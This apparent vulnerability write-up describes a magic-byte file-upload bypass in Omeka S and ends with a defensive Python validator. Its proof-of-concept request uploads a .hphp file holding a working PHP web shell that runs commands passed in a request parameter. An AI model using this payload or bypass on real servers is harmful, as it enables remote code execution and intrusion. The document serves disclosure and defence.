The file upload function is vulnerable: a user can upload a file with a disallowed extension (.php, .phps, ...) by using the Magic Bytes technique. However, the .htaccess has prevented almost all files with extensions such as php, phps, phtml, ... The attacker can still upload an .hphp file and then execute code from a remote machine.

Precondition: the Apache server hosting the web application needs to be configured to execute .hphp files.
Step 1: Log in, go to the function that allows uploading, intercept the request, and modify it as below:
POST /omeka-s/admin/asset/add HTTP/1.1
Host: localhost
Content-Length: 344
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/omeka-s/admin/asset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi
Connection: close

------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="file"; filename="shell_php.hphp"
Content-Type: application/octet-stream

GIF87a <?php echo system($_REQUEST['cmd']);?>
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="o:alt_text"

------WebKitFormBoundary9KHufs2z61gFOMA6--
With the magic bytes GIF87a, the attacker bypasses the file check and can then upload a file (.hphp) whose extension is not in the whitelist.
Step 2: Check the file path
Step 3: Access the file path and execute commands
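As an added defensive example (not code from the original write-up or from Omeka S), a Python upload validator that requires the extension to be on an explicit allowlist, requires the leading bytes to match that specific extension, and then rejects image bodies that carry script markers, so a valid GIF header prepended to PHP code is no longer enough to pass; the allowlist and marker pattern are constructed for illustration:

```python
import os
import re

# Constructed, illustrative allowlist: each permitted extension is mapped to the
# magic bytes a file with that extension must start with. A file is accepted only
# when the extension check AND the matching magic-bytes check both pass.
ALLOWED_SIGNATURES = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Script markers that never belong inside an image body (polyglot detection).
_SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)


def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason).

    Order matters: the extension is checked against the allowlist first (so an
    unknown extension like .hphp is refused regardless of content), then the
    magic bytes must match that extension (so a GIF header on a .png is refused),
    and finally the body is scanned for embedded script markers.
    """
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        return False, "extension %s not in allowlist" % (ext or "(none)")
    if not any(content.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return False, "content does not match magic bytes for %s" % ext
    if _SCRIPT_MARKERS.search(content):
        return False, "script marker found inside image body"
    return True, "ok"
```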